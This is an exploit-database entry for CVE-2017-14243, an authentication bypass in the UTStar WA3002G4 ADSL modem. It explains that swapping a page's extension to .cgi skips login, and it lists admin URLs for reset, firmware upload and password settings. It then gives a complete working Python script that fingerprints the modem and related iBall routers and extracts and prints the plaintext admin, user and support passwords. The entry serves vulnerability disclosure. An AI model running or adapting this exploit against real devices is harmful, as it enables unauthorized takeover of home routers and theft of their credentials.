UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass(CVE-2017-14243)

2017-10-1100:00:00

Root

www.seebug.org

0.098 Low

EPSS

Percentile

94.8%

JSON

Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability

CVE: CVE-2017-14243
Date: 15-09-2017
Exploit Author: Gem George
Author Contact: https://www.linkedin.com/in/gemgrge
Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
Firmware version: WA3002G4-0021.01
Vendor Homepage: http://www.utstar.com/
Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass

Vulnerability Details

The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source.

How to reproduce

Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi

Example URLs:

http://192.168.1.1/info.cgi – Status and details
http://192.168.1.1/upload.cgi – Firmware Upgrade
http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
http://192.168.1.1/pppoe.cgi – PPPoE settings
http://192.168.1.1/resetrouter.cgi – Router reset
http://192.168.1.1/password.cgi – password settings


                                                #/bin/python
# -*- coding: utf-8 -*- 
import sys
import os
import urllib2
import argparse
import re
from termcolor import colored

def get_response(url):
	response = urllib2.urlopen(url)
	return response.read()

def get_info(url):
	res = get_response(url + '/info.cgi')
	if "iB-WRA150N" in res: 	
		print colored('[INF]','green'),  'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'
		print colored('[RES]', 'red'),  'Vulnerable to CVE-2017-6558'
		print colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')
		get_cred(url)
	else:
		if "ADSL2+" in res:		
			print colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'
			print colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'
			print colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')
		else:
			if "96338W" in res:	
				print colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'
				print colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'
				get_cred(url)
			else:
				print colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'
	
	print colored('\r\nCompleted!\r\n','green'), 
def get_cred(url):
	res = get_response(url + '/password.cgi')
	matches = re.findall("(?<=\s').*?(?=')", res, re.DOTALL)
	print '\nUsernames\tPasswords\n', colored('---------\t----------', 'green')
	print 'admin\t\t' + matches[0] + '\nuser\t\t' + matches[1] + '\nsupport\t\t' + matches[2]

def find_between( s, first, last ):
	try:
		start = s.index( first ) + len( first )
		end = s.index( last, start )
		return s[start:end]
	except ValueError:
        	return ""

def display_info():
	print colored('\r\n¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
	print colored('¦','green'), '  Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244	', colored('¦','green')
	print colored('¦','green'), '		 Created by: Gem George				' , colored('¦','green')
	print colored('¦','green'), '	 Website: https://www.techipick.com/ 			', colored('¦','green')
	print colored('¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
	print "\r\n"
	print colored('[SET]','blue'), 'Target URL: ', sys.argv[1]

def main():
	if len(sys.argv) != 2:
		print 'Wrong argument count\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'
		exit()
	else:
		display_info()		
		url = sys.argv[1].rstrip('/')
		get_info(url)
 
if __name__ == "__main__":
    main()

0.098 Low

EPSS

Percentile

94.8%

JSON

Related for SSV:96645